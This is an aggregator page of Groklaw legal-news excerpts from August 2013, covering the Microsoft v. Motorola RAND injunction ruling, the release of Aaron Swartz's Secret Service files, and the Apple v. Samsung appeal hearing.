As discussed above, in certain circumstances seeking injunctive relief may constitute a breach of the RAND commitment, whereas in other circumstances such conduct may be proper. The timing of when a party seeks injunctive relief in a separate forum relative to a pending action is germane to whether that party acted in bad faith in seeking such relief. In other words, it may very well be the case that seeking injunctive relief absent a pending lawsuit is good faith, whereas seeking the same relief during the pendency of litigation over a RAND rate is bad faith. So it's up to the jury. He has, therefore, denied Microsoft's motion asking him to rule that Motorola violated its duty of good faith, because, he says, "there are numerous disputed issues of material fact precluding summary judgment on Microsoft's claim that Motorola violated its good faith duty." So it has to go to a jury. What does it mean? It means that the Microsoft/Apple attempt to get courts to rule that FRAND patent owners can't ever seek injunctions has failed. This court was Microsoft's best chance to win on that, and it lost.
vollständige Meldung - 08/12/13 First 104 pages of Aaron Swartz Secret Service File Released - Who is the female on page 97? ~pj
Kevin Poulsen at Wired reports that the first 104 pages of Aaron Swartz's Secret Service files are available now, with a lot more to come, as a result of court ordered release. There are apparently 14,500 more pages to come.
Look at page 97. It's redacted so the identity of the woman is kept confidential, but it appears from the notation that a woman was in contact with authorities and informing them of conversations between her and Swartz.
vollständige Meldung - 08/09/13 Reports from the Apple v. Samsung Appeal Hearing ~pj - Updated 8Xs - Audio
Today was the day Apple's appeal of Judge Lucy Koh's
refusal to
issue an injunction against Samsung was scheduled at the US Court of Appeals for the Federal Circuit in Washington, DC. And Groklaw had two volunteers there. The first report is in, and we expect Webster to
send in his report next. Groklaw's RFD has the framework of how it went, but he confesses he couldn't predict the outcome.
vollständige Meldung